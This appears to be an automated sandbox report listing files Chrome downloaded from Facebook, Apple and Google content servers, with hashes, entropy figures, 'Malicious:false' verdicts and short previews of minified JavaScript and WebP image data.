                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("APIConstants.brands",[],(function(a,b,c,d,e,f){"use strict";a="3.0";b="v"+a;c=3e3;d=750;f.GRAPH_API_VERSION=a;f.API_VERSION=b;f.DEFAULT_API_LIMIT=c;f.DEFAULT_API_ACCUMULATE_LIMIT=d}),66);.__d("SearchSourceQueryStatus",[],(function(a,b,c,d,e,f){a="ACTIVE";b="COMPLETE";f.ACTIVE=a;f.COMPLETE=b}),66);.__d("SearchSourceCallbackManager",["invariant","SearchSourceQueryStatus","createObjectFrom","nullthrows"],(function(a,b,c,d,e,f,g,h){a=function(){function a(a){this.$9=a.parseFn,typeof this.$9==="function"||h(0,4065),this.$8=a.matchFn,typeof this.$8==="function"||h(0,4066),this.$2=a.alwaysPrefixMatch||!1,this.$6=a.indexFn||i,this.$4=a.exclusions||{},this.reset()}var b=a.prototype;b.search=function(a,b){var c=this.$13(a,b);if(c)return 0;this.$1.push({queryString:a,callback:b});c=this.$1.length-1;this.$10.push(c);return c};b.$13=function(a,b){var c=this,e=this.$14(a),f=!!this.$5[a];if(!e.length){b([],a,f?d("SearchSourceQueryStatus").COMPLETE:d("SearchSourceQueryStatus").
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1566)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):41276
                                                                                                                                                                                                                                Entropy (8bit):5.2368089739293495
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:EkxiX+skUbNIvnXh5hC+gSyJNbX+V4N8zuZYJOKLNWDjqcR5cXcpcO0cDcIvScTu:lskUbNIvnX7hC+MNhZYVNWDjRE3
                                                                                                                                                                                                                                MD5:CF98EF659A7C40F16FB89858EE051693
                                                                                                                                                                                                                                SHA1:F223F862E3DC2347DEC54A932E35C5BC5F794C8D
                                                                                                                                                                                                                                SHA-256:D1DAC8F97C25357AE55BB0FF7EFAB6349022317CFBC549BB2057C15ED2DD337D
                                                                                                                                                                                                                                SHA-512:58043EF2BA149E03964670CA8A2FB8039691129058FB95D29851F84E7D65F66270B5ECBED675D56E871D6722B959FF3AA7ED2672E1E3E89B6F071A90B120C7E4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[706],{43862:function(t){"use strict".t.exports=Object.freeze({ELEMENT:1,TEXT:3,COMMENT:8,DOCUMENT:9,DOCUMENT_TYPE:10,DOCUMENT_FRAGMENT:11})},96339:function(t,e,i){"use strict".var n=i(38694).t.exports=function(t,e){return n.insertNode(t,"insertBefore"),n.childNode(e,"insertBefore"),n.hasParentNode(e,"insertBefore"),e.parentNode.insertBefore(t,e)}},38694:function(t,e,i){"use strict".var n=i(37844),s=i(43862),r=s.COMMENT,a=s.DOCUMENT_FRAGMENT,o=s.ELEMENT,h=s.TEXT,c=[o,h,r,a],u=[o,h,r],l=[o,a].t.exports={parentNode:function(t,e,i){if(i=i||"target",t&&!n(t,l))throw new TypeError(e+": "+i+" must be an Element, or Document Fragment")},childNode:function(t,e,i){if(i=i||"target",t&&!n(t,u))throw new TypeError(e+": "+i+" must be an Element, TextNode, or Comment")},insertNode:function(t,e,i){if(i=i||"node",t&&!n(t,c))throw new TypeError(e+": "+i+" must be an Element, TextNode, Comment, or Document Fragment")},
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2676
                                                                                                                                                                                                                                Entropy (8bit):7.885304942971974
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:hPNyeSlJv5YKYD5en8aGDvyqUSBq95mq0P8kW94mnJPpGRYUpz9daLU59VGov:5H4v+1gMvyqUSozcUd9/JPpuXdb
                                                                                                                                                                                                                                MD5:E83D0CCD004F88265E36FAE521240FA8
                                                                                                                                                                                                                                SHA1:BE550EB1B177EF4761319FF7FAA26D95E22A0B94
                                                                                                                                                                                                                                SHA-256:105F22181D57B719F41F9E17667E8371D45223C9EB919AE0E216317CE9D222B7
                                                                                                                                                                                                                                SHA-512:1F0A46630F67FD8D12F32B988942A991411A6702AD9D383DAB67ECA1FEC7AFF93E458BA2758A91E517A5362B13BC11D0967DB9C9E900372E80C77C58BBF59C2A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/93/65/69/9365698a-8861-3219-065b-aea2043ac9a8/AppIcon.png/146x0w.webp
                                                                                                                                                                                                                                Preview:RIFFl...WEBPVP8X..............ALPH.......m.0j...........G...X.......!"R.mkko..g.*D.s^.#..Te... J..9..W"EL..M.S?..m.!]...jw..m.2...5?.Zyw.c.l.yl..U...U..7.U.=....n#)R.jp..~.....v....A.@*1.. .R.^...." %o=.e.f..iu"RD.n.. ...obm.a....,.~..%.. .....5.<..}.S(.L:.n._~.0&."RR).S+....._|.k..E...s].A%-~...... ....|...F"J$.v.h.n.........|.....t...."a.U....\..L1.XBU_..W.-@....)...... .o...$......@...k..U..[.Em>/&.........."(.../YO.oQ.......B.................3..'Cpv.,"D.$...c..@...C!<jG...........`...!.w..=.>+Dv.....Bdf.=...!...P.6D..x.@..j{!M..Z...m..A.@.....z.....I......P......+.`...%.f.I.[....9d....9_\.D.....:j......Q.?@........{...:.6....%.~..%..^.``&M.....}.......1..!..H..g..".......U!.&..0.BdQ"<~...!...O...C?<.w......c..d...m.......k.Ap...2._a6..{..?...e...Z.<h.......R........z4..M..[B....$5....$.....qR..c..k.!?.r8..F.".#&IF....v.)..u.a3.$...%.j].:I...t.O.\.m.$D.T..'l.a..^}..)7...@..x....V..[...-{..#.`........Ob....+."..Jk....^U............
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (56486)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):57874
                                                                                                                                                                                                                                Entropy (8bit):5.27812742704802
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:6QxJPpoj1J3s106OigQTl0Xh3mPv798TK/67qKMK3R3ygtQTvT:toj1JccGl0XCNgtQTL
                                                                                                                                                                                                                                MD5:72194A5236771968F3CE2BAA7E07754F
                                                                                                                                                                                                                                SHA1:62835C6784EB00F0A01B5235D002EB3F636746EF
                                                                                                                                                                                                                                SHA-256:C340D2D25E2FAE8A64AF6AFD99A5D50D42EDA8C0602332345E67FE2487C612D3
                                                                                                                                                                                                                                SHA-512:EC18040A10CD59A440A1B5DE3BB47F5D608DA48249D0E6B0E9EA5D7E6100E47601DC70DA4222F74B60DDD983DECF2BD41F1741F455490297A81D9E4EC7874927
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/2KW45SaLwT9.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/9cisb7Fe7ih/. */.__d("hoist-non-react-statics-2.5.0",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.hoistNonReactStatics=c()})(this,function(){var a={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},b={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},c=Object.defineProperty,d=Object.getOwnPropertyNames,e=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,g=Object.getPrototypeOf,h=g&&g(Object);return function i(j,k,l){if(typeof k!=="string"){if(h){var m=g(k);m&&m!==h&&i(j,m,l)}m=d(k);e&&(m=m.concat(e(k)));for(var n=0;n<m.length;++n){var o=m[n];if(!a[o]&&!b[o]&&(!l||!l[o])){var p=f(k,o);try{c(j,o,p)}catch(a){}}}return j}return j}})}var j=!1;function k(){j||(j=!0,i());return h.expor
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4009)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):29711
                                                                                                                                                                                                                                Entropy (8bit):5.317426289518869
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:G13AcfZ02LoynipF5Og2kXGe8IcsGAGzaIlJKIV8EQFayvS+jMC1Kju:a5nipF5OSAIcsGAUdRqELZ+wAKju
                                                                                                                                                                                                                                MD5:9F5BC0996E07E4C660060EF0BE768D39
                                                                                                                                                                                                                                SHA1:BACF1E16033FFF53F72BE731B4AC0D1826EBDB72
                                                                                                                                                                                                                                SHA-256:700531CE6BDFF627D99D5C08A1D2FF91317BF6A2F6FF6F2481FF91B98A0664B8
                                                                                                                                                                                                                                SHA-512:2A17F100F9869C7365E16150473A064A4EDCC56A667F608D7AC4DCD0CED0A2FEBFF9B6D6EE4A07A44B7376B13AC818174D723415AFADF10D7EB117A8A4397102
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("FBClipboardLink.react",["cx","fbt","Clipboard","DOMContainer.react","Event","KeyEventController","ReactDOM_DEPRECATED","SubscriptionsHandler","Tooltip.react","isKeyActivation","joinClasses","react","stylex"],(function(a,b,c,d,e,f,g,h,i){var j,k,l=k||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){var b,c;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(b=c=a.call.apply(a,[this].concat(f))||this,c.$1=l.createRef(),c.state={copied:!1,supported:d("Clipboard").isSupported()},c.$2=null,c.$3=null,c.$5=function(a){a.clipboardData&&(a.clipboardData.setData("text/html",c.$8()),a.clipboardData.setData("text",c.$9()),a.preventDefault())},c.$7=function(){if(!c.state.supported)return"Unsupported in this browser";return c.state.copied?c.props.tooltipSuccess:c.props.tooltip},c.$4=function(){c.$3&&(window.clearTimeout(c.$3),c.$3=null)},c.$10=function(){c.$3=window.setTimeout(c.$11,c.props.tooltipSuccessDuration)},c.$6=function
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5853)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):29558
                                                                                                                                                                                                                                Entropy (8bit):5.388505890549651
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:soKw2hCwreZkJUuzZ61f2TT6TQjAxa/8UVRGoqAzPwHDFmvuKy:soBkJ116riAxa/8UVRGnsPwHD0G
                                                                                                                                                                                                                                MD5:AABED003AEEB9228DBB8312DDA8F12B0
                                                                                                                                                                                                                                SHA1:BE84D8205D40BA48AFBFD85514C70ADB47C699A6
                                                                                                                                                                                                                                SHA-256:3DF59EE76E138FF31CA65D4B77F4E07CDD0DFA8B80D0736408600FC9466A59E6
                                                                                                                                                                                                                                SHA-512:3A53DE36659E54EDD51CBBAC70C9F89140DEF240F470145066FA66A7FDAD140521883B29A1746C10602928F3DB0C3A125B3CC7A76A19781C2F7A8ED0980A853B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/BLqydITNHiz.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsAgpExperimentLoggingFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1742895");b=d("FalcoLoggerInternal").create("ads_agp_experiment_logging",a);e=b;g["default"]=e}),98);.__d("AHGLogUtils",["AdsAgpExperimentLoggingFalcoEvent","AdsInterfacesLogEvents","AdsInterfacesLogger"],(function(a,b,c,d,e,f,g){"use strict";var h="IntelligentComponent";function i(a,b){c("AdsInterfacesLogger").log({eventCategory:c("AdsInterfacesLogEvents").EventCategory.USER_ACTION,eventName:a,data:b})}function a(a){var b;i("ahg_messages_loaded",(b={},b.ahg_loaded_messages=a,b.ahg_log_source=h,b))}function b(a,b,c,d){var e;i("ahg_link_click",(e={},e.component_name=a,e.to_uri=b,e.subobject_category=c,e.subobject_type=d,e.ahg_log_source=h,e))}function d(a,b,c,d,e,f,g){var j;i("ahg_message_click",(j={},j.component_name=a,j.message_format=g,j.message_id=b,j.ahg_placement=d,j.subobject_category=e,j.subob
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):6604
                                                                                                                                                                                                                                Entropy (8bit):7.9551157296637225
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:e0IsgH7UQzehOvabtTXcKEdLKjzqKJSLnbqTb4GeJy7AhTCh0I:Ks/JJ/IKfqKwbADAhdI
                                                                                                                                                                                                                                MD5:256A1425D0A85C1AB0591D25DEC11ACB
                                                                                                                                                                                                                                SHA1:6124B098B2B927CCCA1EB60CC6A2905BAE9AB83B
                                                                                                                                                                                                                                SHA-256:C302E89E457BED90F3A4B45693BBC21A12C0674271744B7934994C37F48ECB71
                                                                                                                                                                                                                                SHA-512:BD3D0B0B483E98DAB7CCB4740340D44AC51010EE6A40FCBBA585FA5638174B42C10ED1757254991CDBEA4E46B638CD3D372471B6537BB15767C66A6BDD11E3C8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleVideo221/v4/ce/c0/92/cec092b1-23e1-b4b4-d21a-a86074e9497b/Jobad0fe070-0d8e-4f91-a33b-f7bea27e31cb-170294114-PreviewImage_Preview_Image_Intermediate_nonvideo_331526204_1808287410-Time1718735212636.png/230x0w.webp
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 B....}...*....>.J.I#"...,.4.D....Re.`.`.......4.X?..<..O.....~.|..\.........7.]....o.......{..........W.o./.....}.}..k............q.o.O.-.....k......I._..v....?.~..$}t}..o..y}...@.(....z..~m......S.....8.......~..N.7.>...k}!GX...G$.m......t.2..Pw...i....T...K.6N.=y.......+|.h..k..H......ui...)ereH.......&{.XQ./.+. 8....E..;F..pP...W%.UZ..7s.."p.w....@..........n#rc.......,..Fn...|)@.V.2IG$..C.ZI8K:M...:I.\../;.......h.....Ap..ww.%..I......9'wx"C.$f...f.%i'......H....Vx.......W>n,w...._......G.r,.b...%.V..Z.#...:..uq.a..u-...*...+...A..F..Pcn..T+Yu.....IP.EI;h.z..NZ.P.1.X......V...m..._...n...J*8..u.<t.....;9..}.<..z;5........3.......L$.....y.|..PM.TJ......xMJ...k.o....g(.~....~..].N...8..G.3.\}..`.P/q.....2..=%...,.0F!1.........A.....\T..v..>..<I].x"P\(..6../;........G$...J.......P...$.J...j...0_....+m{.....%....)CBx.s.G..M.........6.".J./..B...s.H?.]..a.`H..r..lpZ'.5wQ.+..|..e.x....x......w.|.....x.......0
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (29520)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):48388
                                                                                                                                                                                                                                Entropy (8bit):5.340300592331525
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:QT3Cl3UR5FlxRBsVZv2r4vlroHKay9/KUbBfNfGg2TnDdQs5CNthxTB3eARGTB:CBbFlxRRrPAYfWs5sB3m
                                                                                                                                                                                                                                MD5:426A047712898C9013413A616E114856
                                                                                                                                                                                                                                SHA1:D8BBB2BB88E1A10EED479E29A01DADE993435DBC
                                                                                                                                                                                                                                SHA-256:D6D27667E77D5FE0560934B1891C821C8F6C3392DC11E89EE73C3C6AE5F13399
                                                                                                                                                                                                                                SHA-512:9391D1B91C9D967C0B2E168231A7C18C3547782AB1CE726B10E2E10FCA513DF0CF18F4ECB668D19F11549DA78CF98E5F5DF2FBD5C031597F7C16C7765D3B5DED
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger")("async_dom").warn("Could not find relativeTo element for %s AsyncDOM operation based on selector: %s",f,g);switch(f){case"hide":b("CSS").hide(h);break;case"show":b("CSS").show(h);break;case"setContent":b("DOM").setContent(h,e);break;case"appendContent":b("DOM").appendContent(h,e);break;case"prependContent":b("DOM").prependContent(h,e);break;case"insertAfter":b("DOM").insertAfter(h,e);break;case"insertBefore":b("DOM").insertBefore(h,e);break;case"remove":b("DOM").remove(h);break;case"replace":b("DOM").replace(h,e);break;default:b("FBLogger")("async_dom").warn("Received invalid command %s for AsyncDOM operation",f)}}}};e.exports=a}),null);.__d("AsyncResponse",["invariant","Bootloader","FBLogger","HTML","WebDriverConfig"],(function(a,b
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2956
                                                                                                                                                                                                                                Entropy (8bit):7.8947833188245395
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:1Qg2PpEf85Sg8rdLsaOqrWOGksN4Fwuc4UNbOvwvvDaS6+LUVNlsxhpJKMCkfMoh:1QJPpE+Sg8BOqBGfNYebOvCD6+wBmZK0
                                                                                                                                                                                                                                MD5:F395717281E0192D30763168651A9068
                                                                                                                                                                                                                                SHA1:0D5571318DE325033ADA3D64FAC793076CF25A9A
                                                                                                                                                                                                                                SHA-256:469285233DD81D518A54C45C4EB727C158B597F1E07342CA2F890834A97F85F4
                                                                                                                                                                                                                                SHA-512:742E8E1EEAB6C15DF57C4DDC5699BCD7AE97915569BB2E88B654E91ABC717E5C2C9E6546BB9C5AD4E1930741A1F90AD198C3DE3CB7D9FC77A14D522C6467B4B1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8Lw.../3....3m..N.g<...O.F.....D.$..m$IN..ZkL..pI.m#I.*../..7...$....?.|.?.@%.=.;5sx...-.(yn......pG.3x...+....y..n..{.C%.F.m.U.F.m....}..*$.?.).m7R.ORf......../R.;.h.6m..\..k....m....l...^.m#h.m....b.n._..=:.1...y.1...Q...(.'g99..8.4.X.e....L.nVY.,....J....3.b.D.aB.!.....Q..Xb.a........h.P...b4h..1$R.... J..e5.X.a*..(.e#.A,b4(.t.a(a`.M$..."PP...#cH)(.E$...rj.F.#..1......6...4P..d.1..Q...P..S.@...c.j.Ni...P...P.(2.*..B.B.D2_..h....{....p...vT..V;.[TW.:....@....* A.$.B....I...._..?..|n....y..O.;6U....N.-3...f.A#....4j...KTa(......K....n.n.v..IF>.)...}/.L...........P.a<.Wm..m..,$..Q.Pgf.R...90r.{...NE$..Bu`)s..L...8\..!u]...J..B&4%.v1.v.o..#...W...".a.P .]. ...~...{...>.9_[.@C...d.......u..S.. ab.=..~Q.l.N.@^.E....B. ! .(...NX...~..'.u...Pa..."....r@=...A..B.(.. !.AX......l...4..c...fdd......Zv.z....R.qb:.. T..EB........=.fV....=..?W.H^..w1.#../ZRv.....`.%.....>X(.$.k@. L..#..X$/....l_|?jJ...\.caG.F.c...%ms..,x....EX..`....
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3079)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):7366
                                                                                                                                                                                                                                Entropy (8bit):5.321790025737973
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:Goi9TDfbkVomRHx+tvD1btkzPRfk+sGQFvMmqJw:ygVtW71bG1fk+sG6vNT
                                                                                                                                                                                                                                MD5:5EA6E5C1344F9A72501CABA99893015A
                                                                                                                                                                                                                                SHA1:B4349BDFF54B80FED5EA1D1E7BBD62661E8ACC9D
                                                                                                                                                                                                                                SHA-256:7ED8D119427D4C430921861A2E4887F5224A8BB23A00EEFB525FC7E747C8E82E
                                                                                                                                                                                                                                SHA-512:50C49A0018B906FCE975ACFDB11FCA7E290C7C57E02AF7770543F44F5050FE678C63FA6EB499CE4C95AC096C13D18C66195DE026060170B057A2DA37920E2B02
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.143.9c5eed88d9a0818b4f5b.js
                                                                                                                                                                                                                                Preview:var __ember_auto_import__.!function(){var e,n,t,r,o,i={90933:function(e,n,t){e.exports=function(){var e=_eai_d,n=_eai_r.function r(e){return e&&e.__esModule?e:Object.assign({default:e},e)}window.emberAutoImportDynamic=function(e){return 1===arguments.length?n("_eai_dyn_"+e):n("_eai_dynt_"+e)(Array.prototype.slice.call(arguments,1))},window.emberAutoImportSync=function(e){return n("_eai_sync_"+e)(Array.prototype.slice.call(arguments,1))},e("@amp/affiliate-util",[],(function(){return r(t(2353))})),e("@amp/foundation/-internals/network",[],(function(){return r(t(73624))})),e("@amp/foundation/-internals/storage",[],(function(){return r(t(92141))})),e("@amp/media-api-config-amp-books-realm",[],(function(){return r(t(52215))})),e("@amp/media-api-config-amp-podcasts-realm",[],(function(){return r(t(61384))})),e("@amp/media-api-config-apps-realm",[],(function(){return r(t(61069))})),e("@amp/media-api-legacy",[],(function(){return r(t(89176))})),e("@amp/web-app-components/custom-elements/locale
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2283)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):207862
                                                                                                                                                                                                                                Entropy (8bit):5.5191575315163295
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:5oNQkTAiHfOBlm7OCr9LLBgQesyImIukrrTz/Q54pTOouzaNzk8P90Q27FvV5CRN:5oNQkTAiHfOBlm7OCr9LLBgsNakrrTzf
                                                                                                                                                                                                                                MD5:2EDD6D8E651F46CD68CCE6C39F5A6F2D
                                                                                                                                                                                                                                SHA1:8DFDF592938B6A702AA31FB52017B2C0BBFFC9E1
                                                                                                                                                                                                                                SHA-256:2D133A688AC2733A69EB7F0E43813E14790088B9D3C743FF34968EE671C07A28
                                                                                                                                                                                                                                SHA-512:9D2E59D01E4A12D5DCDB696A77DBA41ED1C3C2C342A1319FF957CB928804E8CF7A964C0C5640BE83BD37B40EE9C617D089B051629AAC2028D59E6F247CA1FF09
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/excm=_b,_tp,searchview/ed=1/dg=0/wt=2/ujg=1/rs=AB1caFXH7MEeqikYSsZjkxiS8KquzRI1Sw/m=_b,_tp"
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x19b747, 0x103eba3, 0x3f00c093, 0x18c1c783, 0x1, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var baa,daa,iaa,kaa,Ia,saa,xaa,zaa,db,gb,Baa,Caa,Daa,Eaa,lb,nb,Gaa,Iaa,Kaa,sb,Naa,Paa,Qaa,Taa,Waa,Yaa,Zaa,cba,fba,$aa,eba,dba,bba,aba,gba,lba,mba,Nb,qba,tba,vba,uba,wba,bc,ac,zba,ic,Dba,Eba,Gba,Fba,Iba,Jba,Kba,Mba,Lba,Pba,tc,Qba,Rba,Sba,uc,Uba,Vba,xc,Xba,Zba,$ba,Lc,bca,cca,Ic,gca,hca,Hc,Jc,kca,rca,wca,xca,yca,Zc,Bca,vca,hd,Tca,gda,xd,ida,yd,mda,oda,Cd,vda,yda,xda,zda,Ada,Bda,Cda,Dda,Fda,Gda,Kda,Mda,Rda,Sda,Zda,$da,aea,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2256)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2800
                                                                                                                                                                                                                                Entropy (8bit):5.166987020827454
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:upnlrpevhTuAG9tXDMTEkxseaD2ND+gJ7T7+J3SWDWCSSAUNZIoz6hpysy7K4Cf:upnlruLetzMoys/Dg63SF8vOhpysy7K9
                                                                                                                                                                                                                                MD5:2B00E754EC8A552398780F9E970D000C
                                                                                                                                                                                                                                SHA1:D6334FD54EF4F18B69806AAAC7A59A40D61D4565
                                                                                                                                                                                                                                SHA-256:21D51189776F6200F998912EB4FEA70F9B8A48EF2DC37FDFDFAD6E1511E7F463
                                                                                                                                                                                                                                SHA-512:77E6D0C809DBDCA3E23736E3F6B26E64C8EDE4F9426C36EFA3C06F96C47DB2C5E30EDA52B02714791EF2937CB5092949750916D07563428C92DD11D22101F10A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as t}from"./p-2649b6ee.js";var n=t((function(t,n){function e(t,n,e="",r=14,o,i){const s=new Date;o=null!=o?o:window;const u=(i=null!=i?i:/\./.test(o.location.hostname)?o.location.hostname:"").length>0?`domain=${i}; `:"";s.setTime(s.getTime()+24*r*60*60*1e3);let c="";"https:"===o.location.protocol&&(c="; secure"),o.document.cookie=`${t}=${n}; expires=${s.toUTCString()}; ${u}path=${e}${c}`}function r(){let t=!1;try{t="undefined"!=typeof sessionS
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (664)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):14214
                                                                                                                                                                                                                                Entropy (8bit):5.423098025111413
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:5Ou495s6yYMkJqYWJ+Jaucgd/ix0BSc1e6t44KfKb6m3PbBISj:5BVuqYWJ+Jauld/g0BS56t4IuoPlISj
                                                                                                                                                                                                                                MD5:853877426A53490ADEDBCB2E1CE9624E
                                                                                                                                                                                                                                SHA1:BA2E275A1C0148B2F12CA53F17746BB920B7D555
                                                                                                                                                                                                                                SHA-256:F3163FB2E48B27F81ECCDB331EEBD4F05AEAF9AF7253765323A35E869D8E5D6B
                                                                                                                                                                                                                                SHA-512:12368317D1C18BD215ACB20B1D4EB859C72A7DA8FBD8299348E2D5A462EBE57BC015748330C4C1E07FF5404CEBE61B1A228145F9748D92C12DD2B00346AC910E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
